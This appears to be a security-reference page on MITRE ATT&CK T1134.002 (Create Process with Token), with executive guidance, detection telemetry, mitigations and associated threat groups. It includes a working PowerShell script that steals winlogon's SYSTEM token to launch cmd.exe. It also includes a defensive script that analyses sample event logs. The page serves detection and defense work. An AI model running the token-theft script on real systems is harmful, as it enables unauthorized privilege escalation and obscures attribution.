T1134.002: Create Process with Token
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.[1]
Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via Token Impersonation/Theft or created via Make and Impersonate Token before being used to create a process.
While this technique is distinct from Token Impersonation/Theft, the techniques can be used in conjunction where a token is duplicated and then used to create a new process.
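The API sequence the description above refers to, as an added example that is not part of the ATT&CK page or of Microsoft's documentation: a handle to another process's primary token is opened, duplicated as a new primary token (the Token Impersonation/Theft step), and handed to CreateProcessWithTokenW (this sub-technique). It assumes an elevated PowerShell session on Windows in which SeDebugPrivilege and SeImpersonatePrivilege are available (a local Administrator session is enough; enabling SeDebugPrivilege beforehand with AdjustTokenPrivileges is not shown) and a non-protected source process. The class name TokenProc, the function New-ProcessFromToken and the variable names are ours; the function signatures, structure layouts and constants are the Win32 ones.

```powershell
# Added example: duplicate another process's primary token and create a new process under it.
# Names TokenProc / New-ProcessFromToken are ours; the P/Invoke signatures are the Win32 APIs.
$win32 = @"
using System;
using System.Runtime.InteropServices;
public static class TokenProc
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
        public int dwX; public int dwY; public int dwXSize; public int dwYSize;
        public int dwXCountChars; public int dwYCountChars; public int dwFillAttribute; public int dwFlags;
        public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2;
        public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr hProcess, uint dwDesiredAccess, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes,
        int ImpersonationLevel, int TokenType, out IntPtr phNewToken);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags, string lpApplicationName,
        string lpCommandLine, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
"@
Add-Type -TypeDefinition $win32

function New-ProcessFromToken {
    param(
        [Parameter(Mandatory)][int]$SourcePid,                  # process whose token is reused
        [string]$CommandLine = 'C:\Windows\System32\cmd.exe'    # what to launch under that token
    )
    $PROCESS_QUERY_LIMITED_INFORMATION = 0x1000   # all OpenProcessToken needs on the process handle
    $TOKEN_DUPLICATE = 0x0002; $TOKEN_QUERY = 0x0008
    $MAXIMUM_ALLOWED = 0x02000000                 # ask for whatever the token DACL grants us
    $SecurityImpersonation = 2                    # SECURITY_IMPERSONATION_LEVEL
    $TokenPrimary = 1                             # TOKEN_TYPE: only a primary token can back a new process
    $LOGON_WITH_PROFILE = 0x1
    $CREATE_NEW_CONSOLE = 0x10

    $hProc = [TokenProc]::OpenProcess($PROCESS_QUERY_LIMITED_INFORMATION, $false, $SourcePid)
    if ($hProc -eq [IntPtr]::Zero) {
        throw "OpenProcess($SourcePid) failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # Token Impersonation/Theft (T1134.001): open the target's primary token for duplication.
    $hTok = [IntPtr]::Zero
    if (-not [TokenProc]::OpenProcessToken($hProc, $TOKEN_DUPLICATE -bor $TOKEN_QUERY, [ref]$hTok)) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error(); [void][TokenProc]::CloseHandle($hProc)
        throw "OpenProcessToken failed, error $err (SeDebugPrivilege not enabled, or a protected process?)"
    }
    # The duplicate is a new primary token that keeps the original logon session ID (LUID).
    $hDup = [IntPtr]::Zero
    if (-not [TokenProc]::DuplicateTokenEx($hTok, $MAXIMUM_ALLOWED, [IntPtr]::Zero, $SecurityImpersonation, $TokenPrimary, [ref]$hDup)) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        foreach ($h in $hTok, $hProc) { [void][TokenProc]::CloseHandle($h) }
        throw "DuplicateTokenEx failed, error $err"
    }
    # Create Process with Token (T1134.002): the caller must hold SeImpersonatePrivilege.
    $si = New-Object TokenProc+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf([TokenProc+STARTUPINFO])
    $procInfo = New-Object TokenProc+PROCESS_INFORMATION
    $ok = [TokenProc]::CreateProcessWithTokenW($hDup, $LOGON_WITH_PROFILE, $null, $CommandLine, $CREATE_NEW_CONSOLE,
        [IntPtr]::Zero, $null, [ref]$si, [ref]$procInfo)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    foreach ($h in $hDup, $hTok, $hProc) { [void][TokenProc]::CloseHandle($h) }
    if (-not $ok) { throw "CreateProcessWithTokenW failed, error $err" }
    foreach ($h in $procInfo.hThread, $procInfo.hProcess) { [void][TokenProc]::CloseHandle($h) }
    return $procInfo.dwProcessId
}

# Usage: borrow winlogon's SYSTEM token. The returned PID is the process that Security
# event 4688 reports under the SYSTEM account rather than the caller's.
$newPid = New-ProcessFromToken -SourcePid (Get-Process winlogon | Select-Object -First 1).Id
"Started PID $newPid"
```

Nothing here creates a new logon session: the duplicated token carries the source process's logon ID, which is why a process created this way shows an old or system logon session in the audit trail rather than a fresh authentication. That is the difference between this path and runas or Make and Impersonate Token, both of which produce a new logon first.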
Analyst context for executives and security teams
Create Process with Token is a Windows privilege-escalation and defense-evasion behavior in which an adversary starts a new process under another user’s security context. For leaders, the practical risk is that access controls and accountability are weakened when attackers can obtain credentials, impersonation privileges, or reusable tokens and then run tools as a more trusted user.
Executive priority
Prioritize this where Windows administrative access, privileged service accounts, or shared operational workstations are business-critical. The key governance question is whether privileged account use is tightly managed and auditable enough to explain who launched sensitive processes during an incident. This technique also matters for incident response because it can blur user attribution and may appear in chains with broader Access Token Manipulation behavior.
Technical view
This is a Windows sub-technique of Access Token Manipulation (T1134), mapped to the Defense Evasion and Privilege Escalation tactics. MITRE does not provide official detection text for this object, but the supplied relationship identifies DET0456 as a behavior-chain detection strategy for T1134.002. SOC and detection teams should validate that they can tie each process creation to the creating account, the resulting security context, and the logon session of the new process (on Windows 10/Server 2016 and later, Security event 4688 records the creator as Subject and the new process's account as Target Subject when the two differ), and that they can see unusual use of mechanisms such as CreateProcessWithTokenW or runas. Investigations should also consider related token activity, especially Token Impersonation/Theft or Make and Impersonate Token, when local evidence supports that sequence.
Likely telemetry
- Windows process creation events with parent/child process, command line, user, integrity level, and logon/session identifiers (Security event 4688 with its Subject and Target Subject fields; Sysmon event 1 with its LogonId)
- Authentication and logon/session records showing the account context used by the resulting process (Security event 4624, including logon type 9, NewCredentials, which runas /netonly produces, and the logon ID that later appears in 4688)
- Privilege-use and account-management audit events relevant to impersonation or privileged execution (for example 4672 special privileges assigned to a new logon, and 4673/4674 privileged service or object operations when privilege-use auditing is enabled)
- Endpoint detection telemetry that records process token/security context changes or suspicious process ancestry
- Administrative tool usage evidence, including legitimate runas-style activity where available
Detection direction
- Validate behavior-chain analytics rather than relying on a single process name or API reference, because legitimate administration can also create processes under alternate credentials.
- Tune for mismatches between the initiating process/user and the resulting process security context (in 4688, a populated Target Subject that differs from the Subject), especially when privileged or service accounts are involved.
- Correlate with prior token access, token duplication, or impersonation indicators when available, since the ATT&CK object notes this technique may be used with other Access Token Manipulation sub-techniques.
- Account for false positives from approved administration, help desk workflows, software deployment, and scripted maintenance that intentionally use alternate credentials.
- Confirm telemetry retention is sufficient for IR reconstruction; without process, user, and logon-session linkage, attribution and scoping will be weak.
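The creator-versus-resulting-context check from the detection direction above, as an added example that is not part of the ATT&CK page. It runs over constructed Security-log records instead of a live host: field names follow Windows events 4688 (process creation) and 4624 (logon), while the host name WS01, the accounts, logon IDs, timestamps, paths, the allow-list and the function name Find-CrossContextProcessCreation are all made up for illustration. On a real host the same function can be fed objects built from Get-WinEvent output.

```powershell
# Added example: flag 4688 events whose new process runs under a different account than the
# creator, then use the matching 4624 (if any) to tell a fresh logon from a reused session.
# All records below are constructed; the field names are those of events 4688 and 4624.

$sample4624 = @(   # constructed 4624 records, one per logon session
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:00:00'; TargetUserName = 'SYSTEM'; TargetLogonId = '0x3e7';   LogonType = 0 },
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:01:00'; TargetUserName = 'jdoe';   TargetLogonId = '0x5a1c2'; LogonType = 2 },
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:05:02'; TargetUserName = 'admin';  TargetLogonId = '0x7b330'; LogonType = 2 }
)

$sample4688 = @(   # constructed 4688 records
    # 1: jdoe starts cmd.exe in his own context; 4688 leaves Target Subject as '-' / 0x0
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:02:00'; SubjectUserName = 'jdoe';  SubjectLogonId = '0x5a1c2'; TargetUserName = '-';          TargetLogonId = '0x0';     NewProcessName = 'C:\Windows\System32\cmd.exe';       ParentProcessName = 'C:\Windows\explorer.exe' },
    # 2: runas /user:admin cmd.exe; the Secondary Logon service creates it, and a fresh 4624 precedes it by three seconds
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:05:05'; SubjectUserName = 'WS01$'; SubjectLogonId = '0x3e7';   TargetUserName = 'admin';      TargetLogonId = '0x7b330'; NewProcessName = 'C:\Windows\System32\cmd.exe';       ParentProcessName = 'C:\Windows\System32\svchost.exe' },
    # 3: a binary in a user profile spawns cmd.exe under the long-lived SYSTEM session 0x3e7 with no new 4624
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:06:30'; SubjectUserName = 'jdoe';  SubjectLogonId = '0x5a1c2'; TargetUserName = 'SYSTEM';     TargetLogonId = '0x3e7';   NewProcessName = 'C:\Windows\System32\cmd.exe';       ParentProcessName = 'C:\Users\jdoe\Downloads\update.exe' },
    # 4: approved deployment tool running under a service account; suppressed by the allow-list
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:07:00'; SubjectUserName = 'WS01$'; SubjectLogonId = '0x3e7';   TargetUserName = 'svc_deploy'; TargetLogonId = '0x8c440'; NewProcessName = 'C:\Program Files\Deploy\deploy.exe'; ParentProcessName = 'C:\Windows\System32\svchost.exe' }
)

function Find-CrossContextProcessCreation {
    param(
        [Parameter(Mandatory)][object[]]$ProcessEvents,   # 4688 records
        [Parameter(Mandatory)][object[]]$LogonEvents,     # 4624 records
        [string[]]$ApprovedImages = @('C:\Program Files\Deploy\deploy.exe'),   # documented admin tooling
        [int]$NewLogonWindowSeconds = 60
    )
    # Index 4624 by logon-session ID so each 4688 can find where its token's session came from.
    $logonById = @{}
    foreach ($l in $LogonEvents) { $logonById[[string]$l.TargetLogonId] = $l }

    foreach ($p in $ProcessEvents) {
        # Same security context as the creator: 4688 leaves the Target Subject empty.
        if ([string]::IsNullOrEmpty($p.TargetUserName) -or $p.TargetUserName -eq '-') { continue }
        if ($p.TargetUserName -eq $p.SubjectUserName) { continue }
        if ($ApprovedImages -contains $p.NewProcessName) { continue }

        $logon = $logonById[[string]$p.TargetLogonId]
        $age = if ($logon) { ($p.TimeCreated - $logon.TimeCreated).TotalSeconds } else { $null }
        $origin = if ($null -ne $age -and $age -ge 0 -and $age -le $NewLogonWindowSeconds) {
            "new logon (type $($logon.LogonType)) $([int]$age)s before process creation"
        } else {
            'existing session reused, no fresh 4624: consistent with a duplicated token'
        }
        [pscustomobject]@{
            Time    = $p.TimeCreated
            Creator = "$($p.SubjectUserName) ($($p.SubjectLogonId))"
            RunsAs  = "$($p.TargetUserName) ($($p.TargetLogonId))"
            Process = $p.NewProcessName
            Parent  = $p.ParentProcessName
            Origin  = $origin
        }
    }
}

Find-CrossContextProcessCreation -ProcessEvents $sample4688 -LogonEvents $sample4624 | Format-Table -AutoSize
```

Records 1 and 4 are dropped (same context, allow-listed image); records 2 and 3 are reported, and the Origin column is what separates them during triage: a fresh logon a few seconds before the process points at runas or Make and Impersonate Token, while a reused long-lived session with no new 4624 is the shape a duplicated token leaves. On a real host, runas and the CreateProcessWith* functions hand the actual creation to the Secondary Logon service, so expect the Subject to be that service's context and the parent to be its svchost.exe on those paths, as in records 2 and 4; a creator that calls CreateProcessAsUser itself appears as the Subject, as in record 3. Check both shapes against your own records before tuning the allow-list.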
Mitigation priorities
- Implement User Account Management controls: enforce least privilege, remove unnecessary accounts, and ensure account lifecycle processes reduce opportunities for unauthorized token use.
- Strengthen Privileged Account Management: restrict where privileged accounts can log on, limit standing privileges, and monitor privileged account usage for accountability.
- Review which users and services require impersonation or privileged execution rights on Windows systems and reduce them where business need is not clear.
- Document approved administrative workflows that create processes under alternate credentials so SOC teams can distinguish expected activity from suspicious behavior.
- Use incident response playbooks that treat suspicious token-based process creation as a potential privilege-escalation event requiring account, host, and process-tree scoping.
Analyst notes and limits
ATT&CK relationships show use by multiple groups and software entries, including Turla, Lazarus Group, Bankshot, Azorult, KONNI, Empire, PoshC2, ZxShell, Aria-body, REvil, PipeMon, WhisperGate, and TONESHELL. These relationships indicate the behavior is relevant across both malware and post-exploitation tooling, but they should not be read as evidence of current activity in any specific environment.
Official MITRE detection guidance is not provided for this object. The assessment is limited to the supplied ATT&CK fields, external reference to Microsoft runas documentation, and listed relationships. Local Windows audit policy, EDR visibility, account model, and administrative workflows are required to determine real detection coverage and risk.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Related techniques
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1134 | Access Token Manipulation | This object is a sub-technique of Access Token Manipulation. |
Groups, software, and campaigns
G0010: Turla
Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.[1][2][3][4][5]
G0032: Lazarus Group
Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB).[1][2] Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[3]
North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.[4][5][6]
S0344: Azorult
Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft.[1][2]
S0501: PipeMon
PipeMon is a multi-stage modular backdoor used by Winnti Group.[1]
S0378: PoshC2
PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[1]
S0456: Aria-body
S0496: REvil
REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[1][2][3]
S0412: ZxShell
S0689: WhisperGate
WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[1][2][3]
S0356: KONNI
KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.[1][2][3][4][5]
S0239: Bankshot
Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector.[1]
S1239: TONESHELL
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
Object version and sync metadata
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.0 | | Current bundle | acb33dc849fb… |
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.
[2] MITRE ATT&CK. T1134.002: Create Process with Token.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.